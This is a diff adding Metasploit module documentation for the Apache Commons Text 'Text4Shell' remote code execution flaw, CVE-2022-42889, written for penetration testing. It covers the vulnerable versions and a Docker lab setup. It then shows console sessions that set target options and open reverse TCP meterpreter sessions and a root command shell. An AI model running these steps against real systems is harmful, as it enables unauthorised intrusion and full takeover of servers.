Add exploit for CVE-2022-42889

documentation/modules/exploit/multi/http/apache_commons_text4shell.md

@@ -0,0 +1,108 @@
+## Vulnerable Application
+
+This exploit takes advantage of the StringSubstitutor interpolator class,
+which is included in the Commons Text library. A default interpolator
+allows for string lookups that can lead to Remote Code Execution. This
+is due to a logic flaw that makes the “script”, “dns” and “url” lookup
+keys interpolated by default, as opposed to what it should be, according
+to the documentation of the StringLookupFactory class. Those keys allow
+an attacker to execute arbitrary code via lookups primarily using the
+"script" key.
+
+In order to exploit the vulnerabilities, the following requirements must
+be met:
+
+    Run a version of Apache Commons Text from version 1.5 to 1.9
+    Use the StringSubstitutor interpolator
+    Target should run JDK < 15
+
+## Testing
+Follow the steps in [this](https://github.com/karthikuj/cve-2022-42889-text4shell-docker?tab=readme-ov-file) PoC to setup the environment
+
+## Verification Steps
+1. Setup the application
+1. Start msfconsole
+1. Do: `use apache_commons_text4shell`
+1. Set the required options: `RHOST, RPORT, TARGETURI, PARAM, METHOD, TARGET, LHOST`
+1. Do: `run`
+
+## Options
+
+### PARAM
+The parameter vulnerable to the exploit.
+
+### METHOD
+The HTTP method to use. Default: `GET`
+
+### TARGETURI
+The URI to target. Default: `/`
+
+## Scenarios
+
+### Apache Commons Text 1.8 on Alpine Linux v3.9
+
+Check:
+```
+msf6 exploit(multi/http/apache_commons_text4shell) > check
+
+[*] Performing command injection test issuing a sleep command of 5 seconds.
+[+] 172.17.0.2:8080 - The target is vulnerable. Successfully tested command injection.
+```
+
+Target: java
+```
+msf6 > use exploit/multi/http/apache_commons_text4shell
+[*] Using configured payload java/meterpreter/reverse_tcp
+msf6 exploit(multi/http/apache_commons_text4shell) > set lhost docker0
+lhost => 172.17.0.1
+msf6 exploit(multi/http/apache_commons_text4shell) > set rhost 172.17.0.2
+rhost => 172.17.0.2
+msf6 exploit(multi/http/apache_commons_text4shell) > set rport 8080
+rport => 8080
+msf6 exploit(multi/http/apache_commons_text4shell) > set targeturi /text4shell/attack
+targeturi => /text4shell/attack
+msf6 exploit(multi/http/apache_commons_text4shell) > set param search
+param => search
+msf6 exploit(multi/http/apache_commons_text4shell) > set target 0
+target => 0
+msf6 exploit(multi/http/apache_commons_text4shell) > run
+
+[*] Started reverse TCP handler on 172.17.0.1:4444
+[*] Using URL: http://172.17.0.1:8080/cuGgfHN/
+[*] Sending stage (57692 bytes) to 172.17.0.2
+[*] Meterpreter session 16 opened (172.17.0.1:4444 -> 172.17.0.2:39832) at 2023-12-23 23:03:31 +0530
+[*] Server stopped.
+
+meterpreter >
+```
+
+Target: Linux Command
+```
+msf6 exploit(multi/http/apache_commons_text4shell) > set target 3
+target => 3
+msf6 exploit(multi/http/apache_commons_text4shell) > run
+
+[*] Started reverse TCP handler on 172.17.0.1:4444
+[*] Command shell session 17 opened (172.17.0.1:4444 -> 172.17.0.2:36446) at 2023-12-23 23:04:10 +0530
+
+id
+uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
+```
+
+Target: Linux Dropper
+```
+msf6 exploit(multi/http/apache_commons_text4shell) > set target 4
+target => 4
+msf6 exploit(multi/http/apache_commons_text4shell) > run
+
+[*] Started reverse TCP handler on 172.17.0.1:4444
+[*] Using URL: http://172.17.0.1:8080/L8kRU1E8O/
+[*] Client 172.17.0.2 requested /L8kRU1E8O/
+[*] Sending payload to 172.17.0.2
+[*] Sending stage (3045380 bytes) to 172.17.0.2
+[*] Command Stager progress - 100.00% done (113/113 bytes)
+[*] Meterpreter session 18 opened (172.17.0.1:4444 -> 172.17.0.2:39580) at 2023-12-23 23:04:35 +0530
+[*] Server stopped.
+
+meterpreter >
+```